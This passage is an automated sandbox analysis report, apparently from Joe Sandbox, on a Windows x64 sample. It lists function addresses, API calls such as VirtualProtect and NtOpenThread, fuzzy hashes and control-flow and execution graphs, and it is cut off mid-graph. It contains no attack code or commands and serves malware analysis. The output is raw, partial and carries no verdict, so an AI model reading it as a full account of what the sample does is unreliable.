7ff67c7519e9 VirtualProtect 4158->4160 4160->4158 4163 7ff67c751ba0 4 API calls 4162->4163 4164 7ff67c751b53 4163->4164 4185 7ff67c751e10 4186 7ff67c751e2f 4185->4186 4187 7ff67c751ecc 4186->4187 4189 7ff67c751eb5 4186->4189 4192 7ff67c751e55 4186->4192 4188 7ff67c751ed3 signal 4187->4188 4187->4189 4188->4189 4190 7ff67c751ee4 4188->4190 4190->4189 4191 7ff67c751eea signal 4190->4191 4191->4189 4192->4189 4193 7ff67c751f12 signal 4192->4193 4193->4189

                                                      Executed Functions

                                                      Function 00007FF67C751160 Relevance: 13.6, APIs: 9, Instructions: 130sleepstringCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462896821.00007FF67C751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67C750000, based on PE: true
                                                      • Associated: 00000000.00000002.1462706908.00007FF67C750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463067690.00007FF67C759000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463673017.00007FF67C75B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1464132051.00007FF67C75C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1464694682.00007FF67C9D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1464723092.00007FF67C9D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff67c750000_4o8Tgrb384.jbxd
                                                      Similarity
                                                      • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                      • String ID:
                                                      • API String ID: 2643109117-0
                                                      • Opcode ID: 6280596cb761b5b6b7eb17237f18733a4a3115df363d340f4ddf780b65251a53
                                                      • Instruction ID: cae62184bb99cff1592ed0bdeea89f71ee98bf70d4f5ce1a5607d952bba28670
                                                      • Opcode Fuzzy Hash: 6280596cb761b5b6b7eb17237f18733a4a3115df363d340f4ddf780b65251a53
                                                      • Instruction Fuzzy Hash: C2510537E39A4686FB519B26F9503B927A0BF48791F549435C90DD73A2DF3DA8C28340
                                                      Function 00007FF67C751394 Relevance: 1.5, APIs: 1, Instructions: 24nativethreadCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • NtOpenThread.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67C751156), ref: 00007FF67C7513F7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462896821.00007FF67C751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67C750000, based on PE: true
                                                      • Associated: 00000000.00000002.1462706908.00007FF67C750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463067690.00007FF67C759000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463673017.00007FF67C75B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1464132051.00007FF67C75C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1464694682.00007FF67C9D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1464723092.00007FF67C9D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff67c750000_4o8Tgrb384.jbxd
                                                      Similarity
                                                      • API ID: OpenThread
                                                      • String ID:
                                                      • API String ID: 3092547327-0
                                                      • Opcode ID: 5448f1e04505633c8b83ac876f5ebd2ce998eb501d9696bc89039fdec386beb0
                                                      • Instruction ID: afd7862353eafa1924b253a068171aad6ae1081099a611cb3d3b981449a425cc
                                                      • Opcode Fuzzy Hash: 5448f1e04505633c8b83ac876f5ebd2ce998eb501d9696bc89039fdec386beb0
                                                      • Instruction Fuzzy Hash: ADF07472928B4686D714DB51F85153A77A0FB88780B405839EAAC83725EF3CE1908B84

                                                      Non-executed Functions

                                                      Function 00007FF67C753B50 Relevance: 123.0, APIs: 67, Strings: 2, Instructions: 2257COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462896821.00007FF67C751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67C750000, based on PE: true
                                                      • Associated: 00000000.00000002.1462706908.00007FF67C750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463067690.00007FF67C759000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463673017.00007FF67C75B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1464132051.00007FF67C75C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1464694682.00007FF67C9D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1464723092.00007FF67C9D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff67c750000_4o8Tgrb384.jbxd
                                                      Similarity
                                                      • API ID: wcslen$memset$wcscat$wcscpy$_wcsnicmp$memcpy$_wcsicmp
                                                      • String ID: $7%2h
                                                      • API String ID: 3604702941-2135741529
                                                      • Opcode ID: 4edad3bf300135444ca33abc2bc11799258ef6cf3568e0bfdfaab273d99e8052
                                                      • Instruction ID: d39cc9bc64bd8f69125c1e02f6d63624755fb5454db34e28de5d95fa0d64143d
                                                      • Opcode Fuzzy Hash: 4edad3bf300135444ca33abc2bc11799258ef6cf3568e0bfdfaab273d99e8052
                                                      • Instruction Fuzzy Hash: 08534763C3CAC385F7628B29E8023F47760BF95384F645236D98CE65A6EF6D6685C304
                                                      Function 00007FF67C752690 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 322COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462896821.00007FF67C751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67C750000, based on PE: true
                                                      • Associated: 00000000.00000002.1462706908.00007FF67C750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463067690.00007FF67C759000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463673017.00007FF67C75B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1464132051.00007FF67C75C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1464694682.00007FF67C9D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1464723092.00007FF67C9D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff67c750000_4o8Tgrb384.jbxd
                                                      Similarity
                                                      • API ID: wcslen$memsetwcscatwcscpywcsncmp
                                                      • String ID: 0$7%2h$X$`
                                                      • API String ID: 329590056-1471948811
                                                      • Opcode ID: b95cf91eda7b68f57c5181f3b1c7e46db98f7d87f2357bb82c327b923f2a006a
                                                      • Instruction ID: 7cb5da8273c477d9315efdbaaba4c0184dcc189e27506203a10f45e0001622ba
                                                      • Opcode Fuzzy Hash: b95cf91eda7b68f57c5181f3b1c7e46db98f7d87f2357bb82c327b923f2a006a
                                                      • Instruction Fuzzy Hash: 18027C33928B8285E7608F19F8443AA77A0FB857A4F104235DAADA77E6DF7CD185C700
                                                      Function 00007FF67C753350 Relevance: 21.2, APIs: 9, Strings: 5, Instructions: 206COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462896821.00007FF67C751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67C750000, based on PE: true
                                                      • Associated: 00000000.00000002.1462706908.00007FF67C750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463067690.00007FF67C759000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463673017.00007FF67C75B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1464132051.00007FF67C75C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1464694682.00007FF67C9D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1464723092.00007FF67C9D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff67c750000_4o8Tgrb384.jbxd
                                                      Similarity
                                                      • API ID: memset$wcscatwcscpywcslen
                                                      • String ID: $0$0$@$@
                                                      • API String ID: 4263182637-1413854666
                                                      • Opcode ID: 1162d33619bbb34c0f2e9a143d3f60e9be2465dce8d2f97103770710023d22b8
                                                      • Instruction ID: 6bee4029f933c954658aba3329d587ac4982d39fffe988f5890f9975b0bbaa9e
                                                      • Opcode Fuzzy Hash: 1162d33619bbb34c0f2e9a143d3f60e9be2465dce8d2f97103770710023d22b8
                                                      • Instruction Fuzzy Hash: 52B18F2292CBC285F3618B24F4453FA77A0FF85344F505235EA8DA6AA6DF7DD586CB00
                                                      Function 00007FF67C751BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • VirtualQuery.KERNEL32(?,?,?,?,00007FF67C75A4A8,00007FF67C75A4A8,?,?,00007FF67C750000,?,00007FF67C751991), ref: 00007FF67C751C63
                                                      • VirtualProtect.KERNEL32(?,?,?,?,00007FF67C75A4A8,00007FF67C75A4A8,?,?,00007FF67C750000,?,00007FF67C751991), ref: 00007FF67C751CC7
                                                      • memcpy.MSVCRT ref: 00007FF67C751CE0
                                                      • GetLastError.KERNEL32(?,?,?,?,00007FF67C75A4A8,00007FF67C75A4A8,?,?,00007FF67C750000,?,00007FF67C751991), ref: 00007FF67C751D23
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462896821.00007FF67C751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67C750000, based on PE: true
                                                      • Associated: 00000000.00000002.1462706908.00007FF67C750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463067690.00007FF67C759000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463673017.00007FF67C75B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1464132051.00007FF67C75C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1464694682.00007FF67C9D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1464723092.00007FF67C9D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff67c750000_4o8Tgrb384.jbxd
                                                      Similarity
                                                      • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                      • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                      • API String ID: 2595394609-2123141913
                                                      • Opcode ID: a73c2b82d557c5aae947ae703203d5278343e9bd1baf2771f34c60c14f44de3e
                                                      • Instruction ID: a6f2abc7ac449c49be9a48e31757509a47f163fc7312a81860c8b6f5dad259db
                                                      • Opcode Fuzzy Hash: a73c2b82d557c5aae947ae703203d5278343e9bd1baf2771f34c60c14f44de3e
                                                      • Instruction Fuzzy Hash: 99416FA3A29A4682EF918B45F8446B837A0FB85B91F554136CE0DD77A1DE3DE9C6C300
                                                      Function 00007FF67C752104 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462896821.00007FF67C751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67C750000, based on PE: true
                                                      • Associated: 00000000.00000002.1462706908.00007FF67C750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463067690.00007FF67C759000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463673017.00007FF67C75B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1464132051.00007FF67C75C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1464694682.00007FF67C9D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1464723092.00007FF67C9D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff67c750000_4o8Tgrb384.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                      • String ID:
                                                      • API String ID: 3326252324-0
                                                      • Opcode ID: ebbd2e3b6cbfeac7cc2dca93027932662f1a6492cb86fc1cea6d36530fcbbc00
                                                      • Instruction ID: ad042ed42800d9b4f4c2d0a4c0c5de2d4fee5fb78006d79a92af5cbadc8ab652
                                                      • Opcode Fuzzy Hash: ebbd2e3b6cbfeac7cc2dca93027932662f1a6492cb86fc1cea6d36530fcbbc00
                                                      • Instruction Fuzzy Hash: 6E21EA27E39D1286FBAA9B11F9403792360FF14BA0F565471C90ED7AE5DF2CA8C68340
                                                      Function 00007FF67C751E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 640 7ff67c751e10-7ff67c751e2d 641 7ff67c751e3e-7ff67c751e48 640->641 642 7ff67c751e2f-7ff67c751e38 640->642 644 7ff67c751e4a-7ff67c751e53 641->644 645 7ff67c751ea3-7ff67c751ea8 641->645 642->641 643 7ff67c751f60-7ff67c751f69 642->643 646 7ff67c751ecc-7ff67c751ed1 644->646 647 7ff67c751e55-7ff67c751e60 644->647 645->643 648 7ff67c751eae-7ff67c751eb3 645->648 651 7ff67c751f23-7ff67c751f2d 646->651 652 7ff67c751ed3-7ff67c751ee2 signal 646->652 647->645 649 7ff67c751efb-7ff67c751f0a call 7ff67c7589b0 648->649 650 7ff67c751eb5-7ff67c751eba 648->650 649->651 661 7ff67c751f0c-7ff67c751f10 649->661 650->643 655 7ff67c751ec0 650->655 653 7ff67c751f43-7ff67c751f45 651->653 654 7ff67c751f2f-7ff67c751f3f 651->654 652->651 656 7ff67c751ee4-7ff67c751ee8 652->656 653->643 654->653 655->651 659 7ff67c751eea-7ff67c751ef9 signal 656->659 660 7ff67c751f4e-7ff67c751f53 656->660 659->643 662 7ff67c751f5a 660->662 663 7ff67c751f12-7ff67c751f21 signal 661->663 664 7ff67c751f55 661->664 662->643 663->643 664->662
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462896821.00007FF67C751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67C750000, based on PE: true
                                                      • Associated: 00000000.00000002.1462706908.00007FF67C750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463067690.00007FF67C759000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463673017.00007FF67C75B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1464132051.00007FF67C75C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1464694682.00007FF67C9D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1464723092.00007FF67C9D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff67c750000_4o8Tgrb384.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CCG
                                                      • API String ID: 0-1584390748
                                                      • Opcode ID: 4a7ae61e09f356dcb3ca58e8778bf02f31e9e28ceccf92203711060f4d615a68
                                                      • Instruction ID: 1bedd5d5aab1290c1cb762b201dedee19112597569ab22131c1d56ec6d308a85
                                                      • Opcode Fuzzy Hash: 4a7ae61e09f356dcb3ca58e8778bf02f31e9e28ceccf92203711060f4d615a68
                                                      • Instruction Fuzzy Hash: 1621BE23F2E50643FB754228FA9077921819F887A6F298531DE1EC33D5DF2EACC28241
                                                      Function 00007FF67C751880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 665 7ff67c751880-7ff67c75189c 666 7ff67c7518a2-7ff67c7518f9 call 7ff67c752420 call 7ff67c752660 665->666 667 7ff67c751a0f-7ff67c751a1f 665->667 666->667 672 7ff67c7518ff-7ff67c751910 666->672 673 7ff67c751912-7ff67c75191c 672->673 674 7ff67c75193e-7ff67c751941 672->674 675 7ff67c75194d-7ff67c751954 673->675 676 7ff67c75191e-7ff67c751929 673->676 674->675 677 7ff67c751943-7ff67c751947 674->677 680 7ff67c751956-7ff67c751961 675->680 681 7ff67c75199e-7ff67c7519a6 675->681 676->675 678 7ff67c75192b-7ff67c75193a 676->678 677->675 679 7ff67c751a20-7ff67c751a26 677->679 678->674 683 7ff67c751a2c-7ff67c751a37 679->683 684 7ff67c751b87-7ff67c751b98 call 7ff67c751d40 679->684 685 7ff67c751970-7ff67c75199c call 7ff67c751ba0 680->685 681->667 682 7ff67c7519a8-7ff67c7519c1 681->682 686 7ff67c7519df-7ff67c7519e7 682->686 683->681 687 7ff67c751a3d-7ff67c751a5f 683->687 685->681 691 7ff67c7519e9-7ff67c751a0d VirtualProtect 686->691 692 7ff67c7519d0-7ff67c7519dd 686->692 693 7ff67c751a7d-7ff67c751a97 687->693 691->692 692->667 692->686 695 7ff67c751a9d-7ff67c751afa 693->695 696 7ff67c751b74-7ff67c751b82 call 7ff67c751d40 693->696 702 7ff67c751afc-7ff67c751b0e 695->702 703 7ff67c751b22-7ff67c751b26 695->703 696->684 704 7ff67c751b5c-7ff67c751b6c 702->704 705 7ff67c751b10-7ff67c751b20 702->705 706 7ff67c751b2c-7ff67c751b30 703->706 707 7ff67c751a70-7ff67c751a77 703->707 704->696 708 7ff67c751b6f call 7ff67c751d40 704->708 705->703 705->704 706->707 709 7ff67c751b36-7ff67c751b53 call 7ff67c751ba0 706->709 707->681 707->693 708->696 712 7ff67c751b57 709->712 712->712
                                                      APIs
                                                      • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67C751247), ref: 00007FF67C7519F9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462896821.00007FF67C751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67C750000, based on PE: true
                                                      • Associated: 00000000.00000002.1462706908.00007FF67C750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463067690.00007FF67C759000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463673017.00007FF67C75B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1464132051.00007FF67C75C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1464694682.00007FF67C9D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1464723092.00007FF67C9D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff67c750000_4o8Tgrb384.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                      • API String ID: 544645111-395989641
                                                      • Opcode ID: 2650d536b62deb3d9d47a44c5ad09f6013c99e194f6b6cbe57e8081442e2c579
                                                      • Instruction ID: 575846692ff0de880d7a5c7aec972b14051506dd5f555ceac28dbdd0641a5390
                                                      • Opcode Fuzzy Hash: 2650d536b62deb3d9d47a44c5ad09f6013c99e194f6b6cbe57e8081442e2c579
                                                      • Instruction Fuzzy Hash: CC517B77F28986D6EB508B25E8407B83761BB04BA5F588231D92C877A5CF3CE9C2C700
                                                      Function 00007FF67C751800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 713 7ff67c751800-7ff67c751810 714 7ff67c751812-7ff67c751822 713->714 715 7ff67c751824 713->715 716 7ff67c75182b-7ff67c751867 call 7ff67c752290 fprintf 714->716 715->716
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462896821.00007FF67C751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67C750000, based on PE: true
                                                      • Associated: 00000000.00000002.1462706908.00007FF67C750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463067690.00007FF67C759000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463673017.00007FF67C75B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1464132051.00007FF67C75C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1464694682.00007FF67C9D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1464723092.00007FF67C9D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff67c750000_4o8Tgrb384.jbxd
                                                      Similarity
                                                      • API ID: fprintf
                                                      • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                      • API String ID: 383729395-3474627141
                                                      • Opcode ID: b9775bf2c7c001ade3725bf189e2567a0e069ce32717a9dee567922b84cc9567
                                                      • Instruction ID: 43e02ae41001bbde221f69f1e21ff0fa4869bfbb59bffbb831b9f3aa9710c6d4
                                                      • Opcode Fuzzy Hash: b9775bf2c7c001ade3725bf189e2567a0e069ce32717a9dee567922b84cc9567
                                                      • Instruction Fuzzy Hash: 5EF09013E28A9583E721AB25F9410BDA361EB597D1F509235EE4EE7651DF2CF5C2C300
                                                      Function 00007FF67C75219E Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462896821.00007FF67C751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67C750000, based on PE: true
                                                      • Associated: 00000000.00000002.1462706908.00007FF67C750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463067690.00007FF67C759000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463673017.00007FF67C75B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1464132051.00007FF67C75C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1464694682.00007FF67C9D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1464723092.00007FF67C9D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff67c750000_4o8Tgrb384.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                      • String ID:
                                                      • API String ID: 682475483-0
                                                      • Opcode ID: 2996161744fd7a7c03ea6c4091c9ef3f11398d7dc2e98130c39f15d04475f55c
                                                      • Instruction ID: 441f2a60c7e1a8fd496d8bd20f71be395cf48342eaa76a0a4deafa9e56608637
                                                      • Opcode Fuzzy Hash: 2996161744fd7a7c03ea6c4091c9ef3f11398d7dc2e98130c39f15d04475f55c
                                                      • Instruction Fuzzy Hash: E701EC27A2990296F7569B21FE042792670FF14BE0F555435CA0ED7A94DF2CB9D68300

                                                      Execution Graph

                                                      Execution Coverage:3.5%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:1660
                                                      Total number of Limit Nodes:2
                                                      execution_graph 4430 7ff62d5f2104 4431 7ff62d5f2111 EnterCriticalSection 4430->4431 4432 7ff62d5f2218 4430->4432 4434 7ff62d5f220b LeaveCriticalSection 4431->4434 4438 7ff62d5f212e 4431->4438 4433 7ff62d5f2272 4432->4433 4435 7ff62d5f2241 DeleteCriticalSection 4432->4435 4437 7ff62d5f2230 free 4432->4437 4434->4432 4435->4433 4436 7ff62d5f214d TlsGetValue GetLastError 4436->4438 4437->4435 4437->4437 4438->4434 4438->4436 4467 7ff62d5f1e65 4468 7ff62d5f1e67 signal 4467->4468 4469 7ff62d5f1e7c 4468->4469 4471 7ff62d5f1e99 4468->4471 4470 7ff62d5f1e82 signal 4469->4470 4469->4471 4470->4471 4483 7ff62d5f1ac3 4484 7ff62d5f1a70 4483->4484 4485 7ff62d5f1b36 4484->4485 4487 7ff62d5f199e 4484->4487 4490 7ff62d5f1b53 4484->4490 4488 7ff62d5f1ba0 4 API calls 4485->4488 4486 7ff62d5f1a0f 4487->4486 4489 7ff62d5f19e9 VirtualProtect 4487->4489 4488->4490 4489->4487 2786 7ff62d5f1140 2789 7ff62d5f1160 2786->2789 2788 7ff62d5f1156 2790 7ff62d5f118b 2789->2790 2791 7ff62d5f11b9 2789->2791 2790->2791 2794 7ff62d5f1190 2790->2794 2792 7ff62d5f11d3 2791->2792 2793 7ff62d5f11c7 _amsg_exit 2791->2793 2796 7ff62d5f1201 _initterm 2792->2796 2797 7ff62d5f121a 2792->2797 2793->2792 2794->2791 2795 7ff62d5f11a0 Sleep 2794->2795 2795->2791 2795->2794 2796->2797 2814 7ff62d5f1880 2797->2814 2800 7ff62d5f126a 2801 7ff62d5f126f malloc 2800->2801 2802 7ff62d5f128b 2801->2802 2805 7ff62d5f12d2 2801->2805 2803 7ff62d5f12a0 strlen malloc memcpy 2802->2803 2803->2803 2804 7ff62d5f12d0 2803->2804 2804->2805 2827 7ff62d5f3b50 2805->2827 2807 7ff62d5f1315 2808 7ff62d5f1344 2807->2808 2809 7ff62d5f1324 2807->2809 2812 7ff62d5f1160 93 API calls 2808->2812 2810 7ff62d5f132d _cexit 2809->2810 2811 7ff62d5f1338 2809->2811 2810->2811 2811->2788 2813 7ff62d5f1366 2812->2813 2813->2788 2815 7ff62d5f1247 SetUnhandledExceptionFilter 2814->2815 2816 7ff62d5f18a2 2814->2816 2815->2800 2816->2815 2817 7ff62d5f194d 2816->2817 2822 7ff62d5f1a20 2816->2822 2818 7ff62d5f199e 2817->2818 2819 7ff62d5f1956 2817->2819 2818->2815 2821 7ff62d5f19e9 VirtualProtect 2818->2821 2819->2818 3002 7ff62d5f1ba0 2819->3002 2821->2818 2822->2818 2823 7ff62d5f1b5c 2822->2823 2824 7ff62d5f1b36 2822->2824 2825 7ff62d5f1ba0 4 API calls 2824->2825 2826 7ff62d5f1b53 2825->2826 2826->2823 2830 7ff62d5f3b66 2827->2830 2828 7ff62d5f3c60 wcslen 3012 7ff62d5f153f 2828->3012 2830->2828 2834 7ff62d5f3d60 2837 7ff62d5f3d7a memset wcscat memset 2834->2837 2840 7ff62d5f3dd3 2837->2840 2839 7ff62d5f3e23 wcslen 2841 7ff62d5f3e35 2839->2841 2845 7ff62d5f3e7c 2839->2845 2840->2839 2842 7ff62d5f3e50 _wcsnicmp 2841->2842 2843 7ff62d5f3e66 wcslen 2842->2843 2842->2845 2843->2842 2843->2845 2844 7ff62d5f3edd wcscpy wcscat memset 2847 7ff62d5f3f1c 2844->2847 2845->2844 2846 7ff62d5f4024 wcscpy wcscat 2848 7ff62d5f404f memset 2846->2848 2852 7ff62d5f4131 2846->2852 2847->2846 2850 7ff62d5f4070 2848->2850 2849 7ff62d5f40d5 wcslen 2851 7ff62d5f40eb 2849->2851 2857 7ff62d5f412c 2849->2857 2850->2849 2854 7ff62d5f4100 _wcsnicmp 2851->2854 3204 7ff62d5f2df0 2852->3204 2855 7ff62d5f4116 wcslen 2854->2855 2854->2857 2855->2854 2855->2857 2856 7ff62d5f43a3 wcscpy wcscat memset 2858 7ff62d5f43e5 2856->2858 2857->2856 2859 7ff62d5f442a wcscpy wcscat memset 2858->2859 2860 7ff62d5f4470 2859->2860 2861 7ff62d5f44d5 wcscpy wcscat memset 2860->2861 2862 7ff62d5f451b 2861->2862 2863 7ff62d5f454b wcscpy wcscat 2862->2863 2864 7ff62d5f6739 memcpy 2863->2864 2865 7ff62d5f457d 2863->2865 2864->2865 2866 7ff62d5f2df0 11 API calls 2865->2866 2867 7ff62d5f472c 2866->2867 2868 7ff62d5f2df0 11 API calls 2867->2868 2869 7ff62d5f4840 memset 2868->2869 2871 7ff62d5f4861 2869->2871 2870 7ff62d5f48a4 wcscpy wcscat memset 2873 7ff62d5f48ed 2870->2873 2871->2870 2872 